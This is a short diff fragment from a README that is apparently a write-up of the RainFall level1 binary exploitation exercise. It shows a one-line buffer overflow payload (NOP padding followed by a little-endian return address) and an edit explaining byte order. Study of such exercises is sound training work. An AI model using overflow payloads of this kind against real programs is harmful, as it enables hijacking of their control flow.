dbarbry/RainFall/level1/README.md

 echo $(python -c "print('\x90'*76+'\x44\x84\x04\x08')") > /tmp/payload
 ```

-The address has to be written upside down in order to be understood as a pointer address.
+The address has to be written upside down in order to be understood as a pointer address (this is called Little Endian format).
 Executing it in gdb we get this:

 ```sh